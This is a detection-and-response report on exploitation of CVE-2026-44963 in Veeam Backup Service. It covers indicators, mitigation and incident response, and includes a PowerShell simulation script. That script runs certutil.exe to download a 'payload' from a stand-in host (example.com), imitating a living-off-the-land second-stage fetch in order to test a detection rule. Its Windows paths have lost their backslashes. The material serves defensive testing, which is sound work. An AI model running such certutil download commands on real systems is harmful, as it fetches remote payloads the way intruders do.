CVE-2026-44963: Indicators of Veeam Backup Service Exploitation
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
This report outlines indicators of compromise associated with CVE-2026-44963, a vulnerability in Veeam Backup Service that can enable remote code execution through insecure deserialization. Attackers may abuse the flaw to launch suspicious child processes from the Veeam service. The resulting activity can lead to unauthorized access and create opportunities for lateral movement across the network.
Investigation
The investigation centers on detecting suspicious child processes spawned by Veeam.Backup.Service.exe, including tools such as cmd.exe or powershell.exe, and identifying unusual network activity on Veeam-related ports. Analysts should also watch for unauthorized logon events and unexpected file changes within Veeam directories.
Mitigation
To reduce risk, administrators should update Veeam Backup & Replication to a version that addresses the insecure deserialization flaw. Firewall policies should strictly limit access to Veeam ports 9392-9419, and defenders should monitor for authentication to these services by non-administrative domain users. Service accounts should also be restricted according to least-privilege principles.
Response
If suspicious activity is detected, the affected Veeam server should be isolated from the network immediately. Investigators should review process execution logs, including Event ID 4688 and Sysmon telemetry, along with network connection records to determine the extent of compromise. Recent account activity should be audited, and credentials should be reset for any accounts involved during the suspected intrusion window.
Attack Flow
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands: The adversary targets a vulnerability in the Veeam Backup Service (simulated) to gain execution privileges. To maintain a low profile while downloading a second-stage payload, the attacker uses the hijacked Veeam process to spawn
certutil.exe, a common Living-off-the-Land binary, to fetch a remote file. This action is intended to trigger theprocess_creationlogic of the detection rule. -
Regression Test Script:
# SIMULATION START: This script simulates the Veeam service spawning a suspicious process. # Note: Since we cannot easily 'become' the Veeam service without admin/system rights, # we will simulate the telemetry by creating a dummy process that mimics the ParentImage path. $VeeamPath = "C:Program FilesVeeamBackup and ReplicationBackupVeeam.Backup.Service.exe" $TargetBinary = "certutil.exe" Write-Host "[+] Simulating suspicious child process from $VeeamPath" -ForegroundColor Cyan # In a real environment, the vulnerability would cause the service to call this. # For validation, we trigger the process. To strictly match the Sigma rule's # 'ParentImage' requirement in a lab, the tester should manually rename a process # or use a tool to spoof the Parent Process ID (PPID) if testing a specific EDR. Start-Process -FilePath $TargetBinary -ArgumentList "/urlcache /f https://example.com/payload.txt" -WindowStyle Hidden Write-Host "[+] Simulation command executed." -ForegroundColor Green -
Cleanup Commands:
# Remove any temporary files created by the simulation Remove-Item -Path "C:pathtosimulatedpayload.txt" -ErrorAction SilentlyContinue Stop-Process -Name "certutil" -ErrorAction SilentlyContinue